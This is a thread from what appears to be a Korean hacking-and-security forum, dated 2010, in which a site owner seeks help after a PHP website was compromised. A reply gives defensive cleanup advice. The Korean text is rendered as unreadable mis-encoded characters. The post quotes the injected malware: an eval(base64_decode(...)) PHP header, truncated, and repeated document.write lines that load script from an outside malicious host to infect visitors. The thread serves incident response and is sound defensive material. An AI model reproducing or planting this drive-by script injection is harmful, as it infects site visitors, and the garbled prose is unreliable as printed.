Å©·¡Å· ÇÇÇØ

 423, 3/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   basscraft
   ¹éµµ¾î °ü·Ã ¹®ÀÇ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [º¹»ç]


ȸ»ç¿¡¼­ È£½ºÆÃÇÏ°í ÀÖ´Â ¼­¹ö¿¡ ÇØÅ·À» ´çÇؼ­
¼Ò½º°¡ ¾û¸ÁÀÌ µÇ¾ú½À´Ï´Ù.

°ÅÀÇ 10³â ÀüÂë php·Î °³¹ßµÈ »çÀÌÆ®ÀÔ´Ï´Ù.
OS´Â ¸®´ª½º ÀÔ´Ï´Ù.

È®ÀÎÇØ º¸´Ï php ÆÄÀÏ ¸Ç óÀ½¿¡

<?php eval(base64_decode('aWYoIWZ1b... »ý·«...XSkpOw==')); ?>

ÀÌ·± ¼Ò½º°¡ ÀÎÁ§¼ÇµÇ¾î ÀÖ¾ú½À´Ï´Ù.
find ¸í·ÉÀ¸·Î 'eval(base64_decode(' ¹®ÀÚ¿­À» Æ÷ÇÔÇÑ ¼Ò½º¸¦ ã¾Æº¸¾Ò´õ´Ï
Æú´õº°·Î index.php ¶Ç´Â index*.php  µî ÆÄÀϵ鿡 ÀÎÁ§¼ÇµÇ¾î ÀÖ½À´Ï´Ù.

Ãß°¡·Î .js, .html ÆÄÀϵ鿡µµ

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

ÀÌ·± ³»¿ëµéÀÌ ÁÖÀԵǾî ÀÖ½À´Ï´Ù.
°ü¸®¸¦ Á¦´ë·Î ¸øÇÏ°í À־ ¼Ò½ºµµ ¹é¾÷ÀÌ ¾ÈµÈ »óÅ -0-;;;;
³ë°¡´Ù¶óµµ ÀÏÀÏÈ÷ ã¾Æ¼­ Áö¿ì¸é µÇ°ÚÁö¸¸

¹®Á¦´Â ÀÎÁ§¼ÇµÈ ¼Ò½ºÁß ÀϺδ Áß°£ºÎºÐ ÀÌÈÄ ¼Ò½º°¡ ¹¶ÅÖ Àß·Á¹ö¸° °ÍµéÀÌ Á¸ÀçÇؼ­
º¹±¸°¡ ºÒ°¡´ÉÇÑ »óÅÂÀÔ´Ï´Ù.(¿À·¡µÈ ¼Ò½º¸¦ ã¾Æ¼­ º¹±¸ÇÏ°í ÀÖ´ÂÁß...)
º¹±¸¸¦ ´Ù ÇÑ´Ù°í Çصµ ¹éµµ¾î °°Àº°Ô Á¸ÀçÇؼ­ ¶Ç´Ù½Ã µé¾î¿Ã °Í °°¾Æ¼­

¾î´À»çÀÌÆ®¿¡¼­ º» È®ÀÎ ¹æ¹ýÀ¸·Î È®ÀÎÇØ º¸´Ï

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r--  1 root root 196608  2¿ù 27 04:47 /dev/.udev.tdb

ÀÌ·± °á°ú°¡ ÀÖ½À´Ï´Ù.
Àú°Ô ¹éµµ¾î ¸Â´ÂÁö...

´çÀå ´Ù½Ã ¼³Ä¡ÇÏ°í ½ÍÁö¸¸
ÀÏ´Ü À̹ø ¹®Á¦¸¸ ¾î¶»°Ô ³Ñ±â°í
»çÀÌÆ® ¸®´º¾óÀ» Çϱâ·Î ÀáÁ¤ ÇÕÀÇµÈ »óÅÂÀÔ´Ï´Ù.

Á¶¾ðÁ» ºÎŹµå¸³´Ï´Ù.

1. ÃßÃøµÇ´Â ÇØÅ·ÀÇ ¹æ¹ý
2. ÇØÅ·ÀÇ ¸ñÀû ¿¹»óµÇ´Â ÇÇÇØ(ȸ»ç ³», ¿ÜºÎ)
3. ¼Ò½º º¹±¸½Ã À¯ÀÇÇÒ Á¡
4. ¹éµµ¾î Á¦°Å ¹× ½Ã½ºÅÛ Á¤»óÈ­¿¡ ´ëÇÑ Á¶¾ð

Áú¹®ÀÌ ³Ê¹« ¸¹½À´Ï´Ù¸¸...
°³º° Ç׸ñÀÌ¶óµµ ´äº¯ÁÖ½Ã¸é º¹¹ÞÀ¸½Ç ²®´Ï´Ù ^^

  Hit : 4874     Date : 2010/03/03 10:00



    
¸Û¸Û 1. À§ Á¤º¸¸¸À¸·Î´Â ÃßÃøÇϱâ Èûµå³ª ÁÖ·Î À¥ÇØÅ·ÀÌ ¸¹½À´Ï´Ù. ÆÄÀÏÀÌ º¯°æµÈ ½Ã°£¿¡ ÇØ´çÇÏ´Â À¥ ·Î±×¸¦ ºÐ¼®ÇØ º¸¼¼¿ä.
2. Script°¡ »ðÀÔµÈ °ÍÀ¸·Î º¸¾Æ Ãß°¡ÀûÀÎ Client Àå¾Ç ½Ãµµ°¡ ¿¹»óµË´Ï´Ù. IE ºê¶ó¿ìÁ®À§ Ãë¾àÁ¡À»
ÀÌ¿ëÇÏ¿© À¥ »çÀÌÆ®¸¦ ¹æ¹®ÇÏ´Â ´Ù¸¥ Windows »ç¿ëÀÚµéÀ» Ãß°¡ Àå¾ÇÇÏ´Â °ÍÀ» ¸»ÇÕ´Ï´Ù.
3. eval ¿Ü¿¡µµ system, exec, passthru, popen ÇÔ¼ö ¶ÇÇÑ ¹éµµ¾î·Î »ç¿ë °¡´ÉÇÏ´Ï ÇÔ²² °Ë»öÇغ¸¼¼¿ä
4. Å©·¡Å·À» ¾ß±âÇÑ Ãë¾àÁ¡À» ãÁö ¸øÇÏ¸é º¹±¸ ÈÄ¿¡µµ Àç°¨¿° µÉ °¡´É¼ºÀÌ ³ô½À´Ï´Ù.
Script¸¦ ½É´Â ÆÐÅÏÀº ¿ú(ÀÚµ¿ °ø°Ý)¿¡ ÀÇÇÑ °ø°ÝÀÏ °¡´É¼ºÀÌ Å©±â ¶§¹®ÀÔ´Ï´Ù.
iptables¸¦ ÀÌ¿ëÇÑ ¹æÈ­º® Á¤Ã¥ ¼³Á¤ ¶ÇÇÑ °ø°Ý ¹æ¾î¿¡ µµ¿òÀÌ µÉ °ÍÀÔ´Ï´Ù.
(outbounding -¾È¿¡¼­ ¹ÛÀ¸·Î ³ª°¡´Â- ÆÐŶ Â÷´Ü µî)
5. ´äº¯ ¾È ÇÏ¸é º¹ ¸ø ¹Þ´Â°Ç°¡¿ä? ^^
2010/03/09  
383   Win-Trojan/Downloader.8192.BJ[ntsys.exe][3]     nm108
12/06 4961
382   ¾Æ½Ã´ÂºÐ ¾Ë·ÁÁÖ¼¼¿©....³Ý¹ö½º 1.7     ÇØÄ¿´ÞŸ³É
10/27 4941
381   Çü´Ôµé netstatÇؼ­ 8080¶ß´Âµ¥¾îÄÉ¿ä Æ÷¸ËµµÇ޴µ¥[14]     anmgod
02/22 4924
380   ¿©ÀÚÄ£±¸ÀÇ ÁֹιøÈ£¸¦ µµ¿ë´çÇÑ°Å °°½À´Ï´Ù.[14]     simva7
09/16 4906
379   ÄíÅ°¸¦ °¡Áö°í ÇØÅ·À» ÇÏ´Â ¹ýÀÌ ÀÖ´Ù°í µé¾ú´Âµ¥...[7]     bass223
11/18 4894
378   C:\Temp ¿¡ ÀÖ´Â CMS.db3 ÆÄÀÏ ¸ÓÁÒ?[2]     wlals813
06/05 4887
  ¹éµµ¾î °ü·Ã ¹®ÀÇ[1]     basscraft
03/03 4873
376   ´©±º°¡°¡ Á¦ À̸ÞÀÏÀ» ÈÉÃĺ¸´Â°Å °°Àºµ¥....[5]     153com
01/18 4867
375   Á¦°¡ ¿©±â¼­ ¸¸È­ º¸°íÀִµ¥ ¾î¶² ¹Ì±¹ÀÎ µÎ¸íÀ̼­ À̾߱âÇÏ°íÀÖ¾ú½À´Ï´Ù...[9]     ¹ÚÅÂÈ£
07/05 4865
374   µµ¿ÍÁÖ¼¼¿ä.[2]     sdc04303
05/07 4855
373   ÇØÅ·ÇÑ´Ù°í ¹®ÀÚ°¡ ¿Ô´Âµ¥¿ä[9]     yakida1940
10/03 4845
372   ´©Å· Áú¹®ÀÌ¿ä[1]     tjdqhr35
11/16 4824
371   keyhook¿¡´ëÇؼ­[3]     dgesc217
02/13 4765
370   ¾û¶×ÇÑÁþÇÏ´Ù°¡ ¸ÁÇ߾ ÇïÇÁ¹Ì Çø®½º..ÈæÈæ[4]     ÇØÄ¿´ÞŸ³É
10/18 4677
369   µðµµ½º °ø°Ý½Ã ¾ÆÀÌÇÇ Â÷´Ü °ü·Ã Áú¹®µå¸³´Ï´Ù.[8]     jungjae5
12/19 4675
368   µµ¿òÀÌ ÇÊ¿äÇÕ´Ï´Ù. ²À ÀоîÁÖ½Ã°í µµ¿òºÎŹµå·Á¿ä.[4]     ÃÖ¹ÎÁÖ
06/23 4671
367   ÇÁ·Î·¿ÇØÅ·Áß°íÀåÁú¹®ÀÌ¿ä[1]     tolta
01/16 4657
366   ³Ýº¹ ¸¸µé±â ?[16]     gns8701
11/19 4654
365   ³Ýº¿ÇØÅ·..[9]     dbswlgnscjsw
03/18 4644
364   ftpÇØÅ· ´çÇÑ°Å °°Àºµ¥ °¡´ÉÇÑ ÀÏÀÎÁö¿ä??[4]     ssamssam04
07/19 4630
[1][2] 3 [4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org